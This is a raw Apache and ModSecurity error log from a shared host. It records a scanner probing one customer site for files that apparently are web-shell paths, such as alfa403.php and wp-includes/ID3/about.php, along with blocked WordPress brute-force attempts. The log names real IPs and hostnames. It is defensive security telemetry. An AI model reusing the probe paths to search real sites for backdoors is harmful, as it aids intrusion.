[Tue May 26 14:44:57.257836 2026] [security2:error] [pid 636820:tid 637026] [client 20.151.130.61:41045] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/alfa403.php"] [unique_id "ahVkka_r6oOphPch7B-USwAAAEw"]
[Tue May 26 14:44:57.407941 2026] [security2:error] [pid 636820:tid 637039] [client 20.151.130.61:41062] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/test11.php"] [unique_id "ahVkka_r6oOphPch7B-UTwAAAFk"]
[Tue May 26 14:44:57.408084 2026] [security2:error] [pid 636820:tid 637039] [client 20.151.130.61:41062] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/test11.php"] [unique_id "ahVkka_r6oOphPch7B-UTwAAAFk"]
[Tue May 26 14:44:57.609827 2026] [security2:error] [pid 636820:tid 637060] [client 158.62.209.246:50215] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVkka_r6oOphPch7B-URwAAAG4"], referer: https://anujtradingco.com
[Tue May 26 14:44:57.661039 2026] [security2:error] [pid 636820:tid 637067] [client 20.151.130.61:41032] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/koala.php"] [unique_id "ahVkka_r6oOphPch7B-UWgAAAHU"]
[Tue May 26 14:44:57.661159 2026] [security2:error] [pid 636820:tid 637067] [client 20.151.130.61:41032] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/koala.php"] [unique_id "ahVkka_r6oOphPch7B-UWgAAAHU"]
[Tue May 26 14:44:57.763117 2026] [security2:error] [pid 636820:tid 637045] [client 202.141.83.254:19854] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVkka_r6oOphPch7B-UWQAAAF8"]
[Tue May 26 14:44:57.763298 2026] [security2:error] [pid 636820:tid 637045] [client 202.141.83.254:19854] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVkka_r6oOphPch7B-UWQAAAF8"]
[Tue May 26 14:44:57.894296 2026] [security2:error] [pid 636820:tid 636982] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkka_r6oOphPch7B-UVAAAACA"]
[Tue May 26 14:44:57.970676 2026] [security2:error] [pid 636820:tid 637014] [client 20.151.130.61:40980] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/mac.php"] [unique_id "ahVkka_r6oOphPch7B-UZQAAAEA"]
[Tue May 26 14:44:57.970812 2026] [security2:error] [pid 636820:tid 637014] [client 20.151.130.61:40980] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/mac.php"] [unique_id "ahVkka_r6oOphPch7B-UZQAAAEA"]
[Tue May 26 14:44:58.139253 2026] [security2:error] [pid 636820:tid 637055] [client 20.151.130.61:40963] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/25d653587fdfd1.php"] [unique_id "ahVkkq_r6oOphPch7B-UawAAAGk"]
[Tue May 26 14:44:58.139366 2026] [security2:error] [pid 636820:tid 637055] [client 20.151.130.61:40963] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/25d653587fdfd1.php"] [unique_id "ahVkkq_r6oOphPch7B-UawAAAGk"]
[Tue May 26 14:44:58.347000 2026] [security2:error] [pid 636820:tid 636959] [client 20.151.130.61:40913] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/wefile.php"] [unique_id "ahVkkq_r6oOphPch7B-UegAAAAk"]
[Tue May 26 14:44:58.347110 2026] [security2:error] [pid 636820:tid 636959] [client 20.151.130.61:40913] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/wefile.php"] [unique_id "ahVkkq_r6oOphPch7B-UegAAAAk"]
[Tue May 26 14:44:58.397994 2026] [security2:error] [pid 636820:tid 636937] [remote 202.172.25.51:37668] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 51.25.172.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wp-login.php"] [unique_id "ahVkkq_r6oOphPch7B-UcwAAC3Q"]
[Tue May 26 14:44:58.585646 2026] [security2:error] [pid 636820:tid 636979] [client 20.151.130.61:41086] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/casp3.php"] [unique_id "ahVkkq_r6oOphPch7B-UhgAAAB0"]
[Tue May 26 14:44:58.585751 2026] [security2:error] [pid 636820:tid 636979] [client 20.151.130.61:41086] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/casp3.php"] [unique_id "ahVkkq_r6oOphPch7B-UhgAAAB0"]
[Tue May 26 14:44:58.846543 2026] [security2:error] [pid 636820:tid 637034] [client 20.151.130.61:41082] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/index.cgi"] [unique_id "ahVkkq_r6oOphPch7B-UkAAAAFQ"]
[Tue May 26 14:44:58.919216 2026] [security2:error] [pid 636820:tid 636988] [client 20.151.130.61:41082] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/cgi-sys/404.html"] [unique_id "ahVkkq_r6oOphPch7B-UmAAAACY"]
[Tue May 26 14:44:59.025135 2026] [security2:error] [pid 636820:tid 637010] [client 20.151.130.61:41082] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/cgi-sys/404.html"] [unique_id "ahVkk6_r6oOphPch7B-UnAAAADw"]
[Tue May 26 14:44:59.113329 2026] [security2:error] [pid 636820:tid 636989] [client 20.151.130.61:41082] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/wp-admin/css/colour.php"] [unique_id "ahVkk6_r6oOphPch7B-UnQAAACc"]
[Tue May 26 14:44:59.113446 2026] [security2:error] [pid 636820:tid 636989] [client 20.151.130.61:41082] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/wp-admin/css/colour.php"] [unique_id "ahVkk6_r6oOphPch7B-UnQAAACc"]
[Tue May 26 14:44:59.338283 2026] [security2:error] [pid 636820:tid 637055] [client 20.151.130.61:41000] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/half.php"] [unique_id "ahVkk6_r6oOphPch7B-UogAAAGk"]
[Tue May 26 14:44:59.338413 2026] [security2:error] [pid 636820:tid 637055] [client 20.151.130.61:41000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/half.php"] [unique_id "ahVkk6_r6oOphPch7B-UogAAAGk"]
[Tue May 26 14:44:59.542129 2026] [security2:error] [pid 636820:tid 637018] [client 20.151.130.61:41076] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/2P.php"] [unique_id "ahVkk6_r6oOphPch7B-UrAAAAEQ"]
[Tue May 26 14:44:59.542248 2026] [security2:error] [pid 636820:tid 637018] [client 20.151.130.61:41076] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/2P.php"] [unique_id "ahVkk6_r6oOphPch7B-UrAAAAEQ"]
[Tue May 26 14:44:59.800782 2026] [security2:error] [pid 636820:tid 636971] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkk6_r6oOphPch7B-UpgAAABU"]
[Tue May 26 14:44:59.872669 2026] [security2:error] [pid 636820:tid 637077] [client 20.151.130.61:40920] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/tires.php"] [unique_id "ahVkk6_r6oOphPch7B-UswAAAH8"]
[Tue May 26 14:44:59.872780 2026] [security2:error] [pid 636820:tid 637077] [client 20.151.130.61:40920] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/tires.php"] [unique_id "ahVkk6_r6oOphPch7B-UswAAAH8"]
[Tue May 26 14:45:00.066184 2026] [security2:error] [pid 636820:tid 636970] [client 20.151.130.61:41074] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/index.cgi"] [unique_id "ahVklK_r6oOphPch7B-UuQAAABQ"]
[Tue May 26 14:45:00.147149 2026] [security2:error] [pid 636820:tid 637043] [client 20.151.130.61:41074] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/cgi-sys/404.html"] [unique_id "ahVklK_r6oOphPch7B-UvQAAAF0"]
[Tue May 26 14:45:00.218771 2026] [security2:error] [pid 636820:tid 636994] [client 20.151.130.61:41074] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/like.php"] [unique_id "ahVklK_r6oOphPch7B-UvgAAACw"]
[Tue May 26 14:45:00.218929 2026] [security2:error] [pid 636820:tid 636994] [client 20.151.130.61:41074] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/like.php"] [unique_id "ahVklK_r6oOphPch7B-UvgAAACw"]
[Tue May 26 14:45:00.396408 2026] [security2:error] [pid 636820:tid 636966] [client 20.151.130.61:41034] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/.well-known/about.php"] [unique_id "ahVklK_r6oOphPch7B-UvwAAABA"]
[Tue May 26 14:45:00.396538 2026] [security2:error] [pid 636820:tid 636966] [client 20.151.130.61:41034] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/.well-known/about.php"] [unique_id "ahVklK_r6oOphPch7B-UvwAAABA"]
[Tue May 26 14:45:00.879263 2026] [security2:error] [pid 636820:tid 637039] [client 20.151.130.61:40969] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/wp-includes/ID3/about.php"] [unique_id "ahVklK_r6oOphPch7B-U0gAAAFk"]
[Tue May 26 14:45:00.879403 2026] [security2:error] [pid 636820:tid 637039] [client 20.151.130.61:40969] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/wp-includes/ID3/about.php"] [unique_id "ahVklK_r6oOphPch7B-U0gAAAFk"]
[Tue May 26 14:45:01.042687 2026] [security2:error] [pid 636820:tid 637017] [client 20.151.130.61:40987] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/bob.php"] [unique_id "ahVkla_r6oOphPch7B-U1gAAAEM"]
[Tue May 26 14:45:01.042796 2026] [security2:error] [pid 636820:tid 637017] [client 20.151.130.61:40987] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/bob.php"] [unique_id "ahVkla_r6oOphPch7B-U1gAAAEM"]
[Tue May 26 14:45:01.260127 2026] [security2:error] [pid 636820:tid 636977] [client 20.151.130.61:41070] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/t3s.php"] [unique_id "ahVkla_r6oOphPch7B-U3QAAABs"]
[Tue May 26 14:45:01.260225 2026] [security2:error] [pid 636820:tid 636977] [client 20.151.130.61:41070] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/t3s.php"] [unique_id "ahVkla_r6oOphPch7B-U3QAAABs"]
[Tue May 26 14:45:01.476254 2026] [security2:error] [pid 636820:tid 637005] [client 20.151.130.61:41031] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/index.cgi"] [unique_id "ahVkla_r6oOphPch7B-U4QAAADc"]
[Tue May 26 14:45:01.487826 2026] [fcgid:warn] [pid 636820:tid 637022] (70014)End of file found: [client 199.45.155.76:49058] mod_fcgid: can't get data from http client
[Tue May 26 14:45:01.558652 2026] [security2:error] [pid 636820:tid 637066] [client 20.151.130.61:41031] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/cgi-sys/404.html"] [unique_id "ahVkla_r6oOphPch7B-U5gAAAHQ"]
[Tue May 26 14:45:01.810498 2026] [security2:error] [pid 636820:tid 637077] [client 20.151.130.61:41031] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/index.cgi"] [unique_id "ahVkla_r6oOphPch7B-U5wAAAH8"]
[Tue May 26 14:45:01.826740 2026] [security2:error] [pid 636820:tid 636978] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkla_r6oOphPch7B-U4AAAABw"]
[Tue May 26 14:45:01.912179 2026] [security2:error] [pid 636820:tid 636975] [client 20.151.130.61:41031] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/cgi-sys/404.html"] [unique_id "ahVkla_r6oOphPch7B-U7AAAABk"]
[Tue May 26 14:45:02.037059 2026] [security2:error] [pid 636820:tid 637036] [client 20.151.130.61:41031] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/index.cgi"] [unique_id "ahVklq_r6oOphPch7B-U8wAAAFY"]
[Tue May 26 14:45:02.136745 2026] [security2:error] [pid 636820:tid 636994] [client 20.151.130.61:41031] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/cgi-sys/404.html"] [unique_id "ahVklq_r6oOphPch7B-U-AAAACw"]
[Tue May 26 14:45:02.209801 2026] [security2:error] [pid 636820:tid 636976] [client 20.151.130.61:41031] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/uwu.php"] [unique_id "ahVklq_r6oOphPch7B-U-QAAABo"]
[Tue May 26 14:45:02.209935 2026] [security2:error] [pid 636820:tid 636976] [client 20.151.130.61:41031] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/uwu.php"] [unique_id "ahVklq_r6oOphPch7B-U-QAAABo"]
[Tue May 26 14:45:02.251130 2026] [autoindex:error] [pid 636820:tid 636962] [client 199.45.155.76:0] AH01276: Cannot serve directory /home1/bloggkcf/public_html/subbroker.in/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:45:02.855499 2026] [security2:error] [pid 636820:tid 636968] [client 20.151.130.61:41083] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/uwa.php"] [unique_id "ahVklq_r6oOphPch7B-VCgAAABI"]
[Tue May 26 14:45:02.855642 2026] [security2:error] [pid 636820:tid 636968] [client 20.151.130.61:41083] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/uwa.php"] [unique_id "ahVklq_r6oOphPch7B-VCgAAABI"]
[Tue May 26 14:45:03.336739 2026] [security2:error] [pid 636820:tid 637016] [client 20.151.130.61:40909] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/crgio.php"] [unique_id "ahVkl6_r6oOphPch7B-VGQAAAEI"]
[Tue May 26 14:45:03.336826 2026] [security2:error] [pid 636820:tid 637016] [client 20.151.130.61:40909] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/crgio.php"] [unique_id "ahVkl6_r6oOphPch7B-VGQAAAEI"]
[Tue May 26 14:45:03.629803 2026] [security2:error] [pid 636820:tid 637072] [client 20.151.130.61:41054] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/geforce.php"] [unique_id "ahVkl6_r6oOphPch7B-VJAAAAHo"]
[Tue May 26 14:45:03.629899 2026] [security2:error] [pid 636820:tid 637072] [client 20.151.130.61:41054] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/geforce.php"] [unique_id "ahVkl6_r6oOphPch7B-VJAAAAHo"]
[Tue May 26 14:45:03.812712 2026] [security2:error] [pid 636820:tid 637037] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkl6_r6oOphPch7B-VHgAAAFc"]
[Tue May 26 14:45:03.812956 2026] [security2:error] [pid 636820:tid 636841] [remote 178.156.182.155:52730] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 155.182.156.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wp-login.php"] [unique_id "ahVkl6_r6oOphPch7B-VJgAAARQ"]
[Tue May 26 14:45:04.128142 2026] [security2:error] [pid 636820:tid 637050] [client 20.151.130.61:41042] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/pucci.php"] [unique_id "ahVkmK_r6oOphPch7B-VMwAAAGQ"]
[Tue May 26 14:45:04.128250 2026] [security2:error] [pid 636820:tid 637050] [client 20.151.130.61:41042] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/pucci.php"] [unique_id "ahVkmK_r6oOphPch7B-VMwAAAGQ"]
[Tue May 26 14:45:04.324805 2026] [security2:error] [pid 636820:tid 637025] [client 20.151.130.61:41078] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/index.cgi"] [unique_id "ahVkmK_r6oOphPch7B-VOQAAAEs"]
